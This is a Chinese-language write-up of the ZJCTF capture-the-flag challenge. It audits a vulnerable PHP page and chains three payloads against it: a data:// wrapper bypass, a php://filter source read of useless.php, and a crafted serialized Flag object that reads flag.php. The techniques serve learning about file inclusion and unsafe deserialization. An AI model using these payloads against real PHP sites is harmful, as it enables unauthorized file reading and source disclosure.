打开环境
于是进行代码审计
<?php
$text = $_GET["text"];
$file = $_GET["file"];
$password = $_GET["password"];
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){
echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
if(preg_match("/flag/",$file)){
echo "Not now!";
exit();
}else{
include($file); //useless.php
$password = unserialize($password);
echo $password;
}
}
else{
highlight_file(__FILE__);
}
?>
这里我们能控制的是三个点,都是get传参
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))
这个if是判断$text这个变量是否存在并检查这个变量内是否有welcome to the zjctf是否写入,然后利用php伪协议中的data协议
将代码中的字符串利用data协议写入并通过file_get_contents函数读取
data协议
就可以直接构造payload:
?text=data:,welcome to the zjctf
也能通过上面那个data协议中的2,4进行构造,即base64加密与不加密都行
然后进行访问可以得到
证明第一步绕过了
第二个点file,首先对file进行了正则匹配,所以file里面不能有flag,
然后这里有个include函数加上它注释的useless.php,你会发现直接访问是没办法的,然后就会联想到文件包含漏洞,然后就会想到用filter伪协议进行读取内容
所以构造payload:
?text=data:,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
然后把得到的内容去进行base64解密
于是又进行代码审计
<?php
class Flag{ //flag.php
public $file;
public function __tostring(){
if(isset($this->file)){
echo file_get_contents($this->file);
echo "<br>";
return ("U R SO CLOSE !///COME ON PLZ");
}
}
}
?>
再结合前面的
将flag调用,然后给里面file值赋值为flag.php。
序列化后传入password,应该就会出flag。
所以构造payload
<?php
class Flag
{
public $file = 'flag.php';
}
$password = new Flag();
echo urlencode(serialize($password));
然后得到最终payload
?text=data:,welcome%20to%20the%20zjctf&file=useless.php&password=O%3A4%3A"Flag"%3A1%3A%7Bs%3A4%3A"file"%3Bs%3A8%3A"flag.php"%3B%7D
注意这里就不用fliter协议了
然后得到flag
希望这篇文章能够帮助你!